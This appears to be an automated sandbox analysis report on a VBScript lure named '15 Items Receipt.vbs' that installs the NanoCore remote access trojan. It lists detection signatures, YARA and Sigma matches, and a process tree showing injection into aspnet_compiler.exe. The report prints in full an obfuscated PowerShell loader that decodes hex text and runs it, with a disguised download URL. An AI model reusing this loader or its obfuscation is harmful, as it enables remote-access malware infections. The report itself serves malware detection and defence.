Play interactive tour

Edit tour

Windows Analysis Report 15 Items Receipt.vbs

Overview

General Information

Sample Name:	15 Items Receipt.vbs
Analysis ID:	483211
MD5:	590e4e9a8494edba266bcb811dbe41aa
SHA1:	3ef7bb7024c63c97ba01d91e4a63b6ce29b0e0dc
SHA256:	74c35f5c712379fe4199b775e0f75f028dca15d5fed179b2346389160f772903
Tags:	NanoCoreRATvbs
Infos:
Most interesting Screenshot:

Detection

Nanocore

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Malicious sample detected (through community Yara rule)

Sigma detected: NanoCore

VBScript performs obfuscated calls to suspicious functions

Detected Nanocore Rat

Multi AV Scanner detection for domain / URL

Writes to foreign memory regions

Wscript starts Powershell (via cmd or directly)

Very long command line found

Injects a PE file into a foreign processes

Creates an undocumented autostart registry key

Sigma detected: CrackMapExec PowerShell Obfuscation

Hides that the sample has been downloaded from the Internet (zone.identifier)

Uses dynamic DNS services

Queries the volume information (name, serial number etc) of a device

Yara signature match

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

May sleep (evasive loops) to hinder dynamic analysis

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Uses insecure TLS / SSL version for HTTPS connection

Contains long sleeps (>= 3 min)

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Sigma detected: Encoded PowerShell Command Line

Java / VBScript file with very long strings (likely obfuscated code)

Detected TCP or UDP traffic on non-standard ports

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Creates a process in suspended mode (likely to inject code)

Found WSH timer for Javascript or VBS script (likely evasive script)

Classification

Process Tree

System is w10x64

wscript.exe (PID: 6280 cmdline: C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\15 Items Receipt.vbs' MD5: 9A68ADD12EB50DDE7586782C3EB9FF9C)

powershell.exe (PID: 6368 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' $SZXDCFVGBHNJSDFGH = 'https://transferH-Hsh/yxvc69/edrftgH-Htxt'.Replace('H-H','.');$SOS='%!-X-!5-X-!!-X-5%-X-!*-X-!7-X-!8-X-!e-X-!a-X-!d-X-!b-X-!!-X-!5-X-!*-X-!7-X-!8-X-!a-X-%0-X-3d-X-%0-X-%7-X-*e-X-!5-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-!5-X-*%-X-!3-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-5!-X-%7-X-%e-X-5%-X-*5-X-70-X-*c-X-*1-X-*3-X-*5-X-%8-X-%7-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%7-X-%c-X-%7-X-7!-X-%e-X-57-X-%7-X-%9-X-%e-X-5%-X-*5-X-70-X-*c-X-*1-X-*3-X-*5-X-%8-X-%7-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%7-X-%c-X-%7-X-*c-X-!9-X-!5-X-!e-X-%7-X-%9-X-3b-X-0a-X-%!-X-53-X-58-X-!!-X-!3-X-!*-X-5*-X-!7-X-!%-X-!8-X-!e-X-!a-X-58-X-!!-X-!3-X-!*-X-5*-X-!7-X-!%-X-!8-X-!a-X-!b-X-%0-X-3d-X-%0-X-%7-X-!!-X-!f-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-*1-X-!!-X-53-X-5!-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-!7-X-%7-X-%e-X-5%-X-*5-X-70-X-*c-X-*1-X-*3-X-*5-X-%8-X-%7-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%7-X-%c-X-%7-X-57-X-*e-X-!c-X-*f-X-%7-X-%9-X-%e-X-5%-X-*5-X-70-X-*c-X-*1-X-*3-X-*5-X-%8-X-%7-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-%7-X-%c-X-%7-X-7%-X-!9-X-*e-X-%7-X-%9-X-3b-X-0a-X-%!-X-53-X-57-X-58-X-!!-X-!5-X-!3-X-5%-X-!*-X-!7-X-59-X-!8-X-55-X-!a-X-!9-X-53-X-!!-X-!*-X-5*-X-!7-X-!8-X-!a-X-%0-X-3d-X-%7-X-!9-X-*0-X-!5-X-58-X-%8-X-*e-X-*0-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-*0-X-*3-X-*0-X-5!-X-%0-X-%!-X-!5-X-!!-X-5%-X-!*-X-!7-X-!8-X-!e-X-!a-X-!d-X-!b-X-!!-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-!7-X-!%-X-!8-X-!e-X-!a-X-53-X-!!-X-!*-X-!7-X-!8-X-%9-X-%7-X-%e-X-5%-X-*5-X-70-X-*c-X-*1-X-*3-X-*5-X-%8-X-%7-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%7-X-%c-X-%7-X-*5-X-*0-X-57-X-*0-X-%d-X-!f-X-*%-X-*a-X-*0-X-!5-X-%7-X-%9-X-%e-X-5%-X-*5-X-70-X-*c-X-*1-X-*3-X-*5-X-%8-X-%7-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-%7-X-%c-X-%7-X-!5-X-!*-X-!7-X-!8-X-!a-X-%9-X-%e-X-%!-X-53-X-58-X-!!-X-!3-X-!*-X-5*-X-!7-X-!%-X-!8-X-!e-X-!a-X-58-X-!!-X-!3-X-!*-X-5*-X-!7-X-!%-X-!8-X-!a-X-!b-X-%8-X-%!-X-53-X-5a-X-58-X-!!-X-!3-X-!*-X-5*-X-%7-X-%9-X-3b-X-0a-X-%*-X-%8-X-%7-X-!9-X-%7-X-%b-X-%7-X-!5-X-58-X-%7-X-%9-X-%8-X-%!-X-53-X-57-X-58-X-!!-X-!5-X-!3-X-5%-X-!*-X-!7-X-59-X-!8-X-55-X-!a-X-!9-X-53-X-!!-X-!*-X-5*-X-!7-X-!8-X-!a-X-%0-X-%d-X-!a-X-*f-X-*9-X-*e-X-%0-X-%7-X-%7-X-%9-X-7c-X-%*-X-%8-X-%7-X-!9-X-%7-X-%b-X-%7-X-!5-X-58-X-%7-X-%9-X-3b'.Replace('%','2').Replace('!','4').Replace('*','6');Invoke-Expression (-join ($SOS -split '-X-' | ? { $_ } | % { [char][convert]::ToUInt32($_,16) })) MD5: 95000560239032BC68B4C2FDFCDEF913)

conhost.exe (PID: 6408 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

aspnet_compiler.exe (PID: 6860 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe MD5: 17CC69238395DF61AAF483BCEF02E7C9)

aspnet_compiler.exe (PID: 1012 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe MD5: 17CC69238395DF61AAF483BCEF02E7C9)

aspnet_compiler.exe (PID: 3092 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe MD5: 17CC69238395DF61AAF483BCEF02E7C9)

cleanup

Malware Configuration

No configs have been found

Yara Overview

Initial Sample

Source	Rule	Description	Author	Strings
15 Items Receipt.vbs	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth	0x30:$s1: POwerSheLL

Dropped Files

Source	Rule	Description	Author	Strings
C:\Users\Public\Run\New.vbs	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth	0x30:$s1: POwerSheLL

Memory Dumps

Source	Rule	Description	Author	Strings
00000000.00000003.416393768.0000022F43489000.00000004.00000001.sdmp	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth	0x140:$s1: POwerSheLL 0x1a10:$s1: POwerSheLL
00000000.00000003.416548477.0000022F43568000.00000004.00000001.sdmp	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth	0x4608:$s1: POwerSheLL 0xc158:$s1: POwerSheLL 0x117a8:$s1: POwerSheLL
00000000.00000002.417297816.0000022F4356A000.00000004.00000001.sdmp	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth	0x2608:$s1: POwerSheLL 0xa158:$s1: POwerSheLL 0xf7a8:$s1: POwerSheLL
00000000.00000002.417934002.0000022F45340000.00000004.00000001.sdmp	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth	0x118:$s1: POwerSheLL
00000000.00000003.415037568.0000022F45341000.00000004.00000001.sdmp	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth	0x9b0:$s1: POwerSheLL 0x2242:$s1: POwerSheLL
00000000.00000002.417252969.0000022F4355A000.00000004.00000001.sdmp	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth	0x8660:$s1: POwerSheLL
00000000.00000002.416992002.0000022F4348A000.00000004.00000040.sdmp	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth	0xa10:$s1: POwerSheLL
00000002.00000002.405872128.00000259CC2EA000.00000004.00000001.sdmp	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth	0x3126:$s1: POwerSheLL 0x652a:$s1: powershell 0x652a:$sr1: powershell 0x652a:$sn1: powershell
00000017.00000003.461956661.00000000041C7000.00000004.00000001.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x16da:$a: NanoCore 0x16ff:$a: NanoCore 0x1758:$a: NanoCore 0x118f5:$a: NanoCore 0x1191b:$a: NanoCore 0x11977:$a: NanoCore 0x1e7cc:$a: NanoCore 0x1e825:$a: NanoCore 0x1e858:$a: NanoCore 0x1ea84:$a: NanoCore 0x1eb00:$a: NanoCore 0x1f119:$a: NanoCore 0x1f262:$a: NanoCore 0x1f736:$a: NanoCore 0x1fa1d:$a: NanoCore 0x1fa34:$a: NanoCore 0x22dbd:$a: NanoCore 0x24177:$a: NanoCore 0x241c1:$a: NanoCore 0x24e1b:$a: NanoCore 0x2a400:$a: NanoCore
Process Memory Space: aspnet_compiler.exe PID: 3092	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x1bbe5:$a: NanoCore 0x1bc21:$a: NanoCore 0x2e4b6:$a: NanoCore 0x2e4ca:$a: NanoCore 0x34776:$a: NanoCore 0x3479b:$a: NanoCore 0x38249:$a: NanoCore 0x3826c:$a: NanoCore 0x382c1:$a: NanoCore 0x43439:$a: NanoCore 0x4345d:$a: NanoCore 0x434b5:$a: NanoCore 0x4a92b:$a: NanoCore 0x4a984:$a: NanoCore 0x4a9aa:$a: NanoCore 0x4ad38:$a: NanoCore 0x4adae:$a: NanoCore 0x4ae01:$a: NanoCore 0x4ae30:$a: NanoCore 0x4b036:$a: NanoCore 0x4b0aa:$a: NanoCore
Click to see the 5 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
23.3.aspnet_compiler.exe.41e9dcf.1.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x3831:$x1: NanoCore.ClientPluginHost 0x386a:$x2: IClientNetworkHost
23.3.aspnet_compiler.exe.41e9dcf.1.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0x3831:$x2: NanoCore.ClientPluginHost 0x394c:$s4: PipeCreated 0x384b:$s5: IClientLoggingHost
23.3.aspnet_compiler.exe.41cfd76.0.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x6da5:$x1: NanoCore.ClientPluginHost 0x6dd2:$x2: IClientNetworkHost
23.3.aspnet_compiler.exe.41cfd76.0.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0x6da5:$x2: NanoCore.ClientPluginHost 0x7d74:$s2: FileCommand 0xc776:$s4: PipeCreated 0x6dbf:$s5: IClientLoggingHost
23.3.aspnet_compiler.exe.41e43a1.2.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x16e3:$x1: NanoCore.ClientPluginHost 0x6dd6:$x1: NanoCore.ClientPluginHost 0xd05f:$x1: NanoCore.ClientPluginHost 0x1766e:$x1: NanoCore.ClientPluginHost 0x21a99:$x1: NanoCore.ClientPluginHost 0x2ca76:$x1: NanoCore.ClientPluginHost 0x38818:$x1: NanoCore.ClientPluginHost 0x5d71c:$x1: NanoCore.ClientPluginHost 0x6cb5c:$x1: NanoCore.ClientPluginHost 0x171c:$x2: IClientNetworkHost 0xd098:$x2: IClientNetworkHost 0x177cb:$x2: IClientNetworkHost 0x21ad2:$x2: IClientNetworkHost 0x2ca90:$x2: IClientNetworkHost 0x38832:$x2: IClientNetworkHost 0x5d736:$x2: IClientNetworkHost 0x6cb99:$x2: IClientNetworkHost
23.3.aspnet_compiler.exe.41e43a1.2.raw.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x142b:$a: NanoCore 0x1484:$a: NanoCore 0x14b7:$a: NanoCore 0x16e3:$a: NanoCore 0x175f:$a: NanoCore 0x1d78:$a: NanoCore 0x1ec1:$a: NanoCore 0x2395:$a: NanoCore 0x267c:$a: NanoCore 0x2693:$a: NanoCore 0x5a1c:$a: NanoCore 0x6dd6:$a: NanoCore 0x6e20:$a: NanoCore 0x7a7a:$a: NanoCore 0xd05f:$a: NanoCore 0xd0d9:$a: NanoCore 0x1766e:$a: NanoCore 0x17758:$a: NanoCore 0x185cf:$a: NanoCore 0x21779:$a: NanoCore 0x217da:$a: NanoCore
23.3.aspnet_compiler.exe.41e9dcf.1.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x13a8:$x1: NanoCore.ClientPluginHost 0x7631:$x1: NanoCore.ClientPluginHost 0x11c40:$x1: NanoCore.ClientPluginHost 0x1c06b:$x1: NanoCore.ClientPluginHost 0x27048:$x1: NanoCore.ClientPluginHost 0x32dea:$x1: NanoCore.ClientPluginHost 0x57cee:$x1: NanoCore.ClientPluginHost 0x6712e:$x1: NanoCore.ClientPluginHost 0x766a:$x2: IClientNetworkHost 0x11d9d:$x2: IClientNetworkHost 0x1c0a4:$x2: IClientNetworkHost 0x27062:$x2: IClientNetworkHost 0x32e04:$x2: IClientNetworkHost 0x57d08:$x2: IClientNetworkHost 0x6716b:$x2: IClientNetworkHost
23.3.aspnet_compiler.exe.41e9dcf.1.raw.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x13a8:$a: NanoCore 0x13f2:$a: NanoCore 0x204c:$a: NanoCore 0x7631:$a: NanoCore 0x76ab:$a: NanoCore 0x11c40:$a: NanoCore 0x11d2a:$a: NanoCore 0x12ba1:$a: NanoCore 0x1bd4b:$a: NanoCore 0x1bdac:$a: NanoCore 0x1bdef:$a: NanoCore 0x1be2f:$a: NanoCore 0x1c06b:$a: NanoCore 0x1c10b:$a: NanoCore 0x1c8e3:$a: NanoCore 0x1ced6:$a: NanoCore 0x1d027:$a: NanoCore 0x1de81:$a: NanoCore 0x1e0e8:$a: NanoCore 0x1e0fd:$a: NanoCore 0x1e11c:$a: NanoCore
23.3.aspnet_compiler.exe.41cfd76.0.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x8ba5:$x1: NanoCore.ClientPluginHost 0x15d0e:$x1: NanoCore.ClientPluginHost 0x1b401:$x1: NanoCore.ClientPluginHost 0x2168a:$x1: NanoCore.ClientPluginHost 0x2bc99:$x1: NanoCore.ClientPluginHost 0x360c4:$x1: NanoCore.ClientPluginHost 0x410a1:$x1: NanoCore.ClientPluginHost 0x4ce43:$x1: NanoCore.ClientPluginHost 0x71d47:$x1: NanoCore.ClientPluginHost 0x81187:$x1: NanoCore.ClientPluginHost 0x8bd2:$x2: IClientNetworkHost 0x15d47:$x2: IClientNetworkHost 0x216c3:$x2: IClientNetworkHost 0x2bdf6:$x2: IClientNetworkHost 0x360fd:$x2: IClientNetworkHost 0x410bb:$x2: IClientNetworkHost 0x4ce5d:$x2: IClientNetworkHost 0x71d61:$x2: IClientNetworkHost 0x811c4:$x2: IClientNetworkHost
23.3.aspnet_compiler.exe.41cfd76.0.raw.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x8b7f:$a: NanoCore 0x8ba5:$a: NanoCore 0x8c01:$a: NanoCore 0x15a56:$a: NanoCore 0x15aaf:$a: NanoCore 0x15ae2:$a: NanoCore 0x15d0e:$a: NanoCore 0x15d8a:$a: NanoCore 0x163a3:$a: NanoCore 0x164ec:$a: NanoCore 0x169c0:$a: NanoCore 0x16ca7:$a: NanoCore 0x16cbe:$a: NanoCore 0x1a047:$a: NanoCore 0x1b401:$a: NanoCore 0x1b44b:$a: NanoCore 0x1c0a5:$a: NanoCore 0x2168a:$a: NanoCore 0x21704:$a: NanoCore 0x2bc99:$a: NanoCore 0x2bd83:$a: NanoCore
Click to see the 5 entries

Sigma Overview

AV Detection:

Sigma detected: NanoCore

Show sources

Source: File created

Author: Joe Security: Data: EventID: 11, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe, ProcessId: 3092, TargetFilename: C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\run.dat

E-Banking Fraud:

Sigma detected: NanoCore

Show sources

Source: File created

System Summary:

Sigma detected: CrackMapExec PowerShell Obfuscation

Show sources

Source: Process started

Author: Thomas Patzke: Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' $SZXDCFVGBHNJSDFGH = 'https://transferH-Hsh/yxvc69/edrftgH-Htxt'.Replace('H-H','.');$SOS='%!-X-!5-X-!!-X-5%-X-!*-X-!7-X-!8-X-!e-X-!a-X-!d-X-!b-X-!!-X-!5-X-!*-X-!7-X-!8-X-!a-X-%0-X-3d-X-%0-X-%7-X-*e-X-!5-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-!5-X-*%-X-!3-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-5!-X-%7-X-%e-X-5%-X-*5-X-70-X-*c-X-*1-X-*3-X-*5-X-%8-X-%7-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%7-X-%c-X-%7-X-7!-X-%e-X-57-X-%7-X-%9-X-%e-X-5%-X-*5-X-70-X-*c-X-*1-X-*3-X-*5-X-%8-X-%7-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%7-X-%c-X-%7-X-*c-X-!9-X-!5-X-!e-X-%7-X-%9-X-3b-X-0a-X-%!-X-53-X-58-X-!!-X-!3-X-!*-X-5*-X-!7-X-!%-X-!8-X-!e-X-!a-X-58-X-!!-X-!3-X-!*-X-5*-X-!7-X-!%-X-!8-X-!a-X-!b-X-%0-X-3d-X-%0-X-%7-X-!!-X-!f-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-*1-X-!!-X-53-X-5!-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-!7-X-%7-X-%e-X-5%-X-*5-X-70-X-*c-X-*1-X-*3-X-*5-X-%8-X-%7-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%7-X-%c-X-%7-X-57-X-*e-X-!c-X-*f-X-%7-X-%9-X-%e-X-5%-X-*5-X-70-X-*c-X-*1-X-*3-X-*5-X-%8-X-%7-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-%7-X-%c-X-%7-X-7%-X-!9-X-*e-X-%7-X-%9-X-3b-X-0a-X-%!-X-53-X-57-X-58-X-!!-X-!5-X-!3-X-5%-X-!*-X-!7-X-59-X-!8-X-55-X-!a-X-!9-X-53-X-!!-X-!*-X-5*-X-!7-X-!8-X-!a-X-%0-X-3d-X-%7-X-!9-X-*0-X-!5-X-58-X-%8-X-*e-X-*0-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-*0-X-*3-X-*0-X-5!-X-%0-X-%!-X-!5-X-!!-X-5%-X-!*-X-!7-X-!8-X-!e-X-!a-X-!d-X-!b-X-!!-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-!7-X-!%-X-!8-X-!e-X-!a-X-53-X-!!-X-!*-X-!7-X-!8-X-%9-X-%7-X-%e-X-5%-X-*5-X-70-X-*c-X-*1-X-*3-X-*5-X-%8-X-%7-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%7-X-%c-X-%7-X-*5-X-*0-X-57-X-*0-X-%d-X-!f-X-*%-X-*a-X-*0-X-!5-X-%7-X-%9-X-%e-X-5%-X-*5-X-70-X-*c-X-*1-X-*3-X-*5-X-%8-X-%7-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-%7-X-%c-X-%7-X-!5-X-!*-X-!7-X-!8-X-!a-X-%9-X-%e-X-%!-X-53-X-58-X-!!-X-!3-X-!*-X-5*-X-!7-X-!%-X-!8-X-!e-X-!a-X-58-X-!!-X-!3-X-!*-X-5*-X-!7-X-!%-X-!8-X-!a-X-!b-X-%8-X-%!-X-53-X-5a-X-58-X-!!-X-!3-X-!*-X-5*-X-%7-X-%9-X-3b-X-0a-X-%*-X-%8-X-%7-X-!9-X-%7-X-%b-X-%7-X-!5-X-58-X-%7-X-%9-X-%8-X-%!-X-53-X-57-X-58-X-!!-X-!5-X-!3-X-5%-X-!*-X-!7-X-59-X-!8-X-55-X-!a-X-!9-X-53-X-!!-X-!*-X-5*-X-!7-X-!8-X-!a-X-%0-X-%d-X-!a-X-*f-X-*9-X-*e-X-%0-X-%7-X-%7-X-%9-X-7c-X-%*-X-%8-X-%7-X-!9-X-%7-X-%b-X-%7-X-!5-X-58-X-%7-X-%9-X-3b'.Replace('%','2').Replace('!','4').Replace('*','6');Invoke-Expression (-join ($SOS -spl

Sigma detected: Encoded PowerShell Command Line

Show sources

Source: Process started

Author: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community: Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' $SZXDCFVGBHNJSDFGH = 'https://transferH-Hsh/yxvc69/edrftgH-Htxt'.Replace('H-H','.');$SOS='%!-X-!5-X-!!-X-5%-X-!*-X-!7-X-!8-X-!e-X-!a-X-!d-X-!b-X-!!-X-!5-X-!*-X-!7-X-!8-X-!a-X-%0-X-3d-X-%0-X-%7-X-*e-X-!5-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-!5-X-*%-X-!3-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-5!-X-%7-X-%e-X-5%-X-*5-X-70-X-*c-X-*1-X-*3-X-*5-X-%8-X-%7-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%7-X-%c-X-%7-X-7!-X-%e-X-57-X-%7-X-%9-X-%e-X-5%-X-*5-X-70-X-*c-X-*1-X-*3-X-*5-X-%8-X-%7-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%7-X-%c-X-%7-X-*c-X-!9-X-!5-X-!e-X-%7-X-%9-X-3b-X-0a-X-%!-X-53-X-58-X-!!-X-!3-X-!*-X-5*-X-!7-X-!%-X-!8-X-!e-X-!a-X-58-X-!!-X-!3-X-!*-X-5*-X-!7-X-!%-X-!8-X-!a-X-!b-X-%0-X-3d-X-%0-X-%7-X-!!-X-!f-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-*1-X-!!-X-53-X-5!-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-!7-X-%7-X-%e-X-5%-X-*5-X-70-X-*c-X-*1-X-*3-X-*5-X-%8-X-%7-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%7-X-%c-X-%7-X-57-X-*e-X-!c-X-*f-X-%7-X-%9-X-%e-X-5%-X-*5-X-70-X-*c-X-*1-X-*3-X-*5-X-%8-X-%7-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-%7-X-%c-X-%7-X-7%-X-!9-X-*e-X-%7-X-%9-X-3b-X-0a-X-%!-X-53-X-57-X-58-X-!!-X-!5-X-!3-X-5%-X-!*-X-!7-X-59-X-!8-X-55-X-!a-X-!9-X-53-X-!!-X-!*-X-5*-X-!7-X-!8-X-!a-X-%0-X-3d-X-%7-X-!9-X-*0-X-!5-X-58-X-%8-X-*e-X-*0-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-*0-X-*3-X-*0-X-5!-X-%0-X-%!-X-!5-X-!!-X-5%-X-!*-X-!7-X-!8-X-!e-X-!a-X-!d-X-!b-X-!!-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-!7-X-!%-X-!8-X-!e-X-!a-X-53-X-!!-X-!*-X-!7-X-!8-X-%9-X-%7-X-%e-X-5%-X-*5-X-70-X-*c-X-*1-X-*3-X-*5-X-%8-X-%7-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%7-X-%c-X-%7-X-*5-X-*0-X-57-X-*0-X-%d-X-!f-X-*%-X-*a-X-*0-X-!5-X-%7-X-%9-X-%e-X-5%-X-*5-X-70-X-*c-X-*1-X-*3-X-*5-X-%8-X-%7-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-%7-X-%c-X-%7-X-!5-X-!*-X-!7-X-!8-X-!a-X-%9-X-%e-X-%!-X-53-X-58-X-!!-X-!3-X-!*-X-5*-X-!7-X-!%-X-!8-X-!e-X-!a-X-58-X-!!-X-!3-X-!*-X-5*-X-!7-X-!%-X-!8-X-!a-X-!b-X-%8-X-%!-X-53-X-5a-X-58-X-!!-X-!3-X-!*-X-5*-X-%7-X-%9-X-3b-X-0a-X-%*-X-%8-X-%7-X-!9-X-%7-X-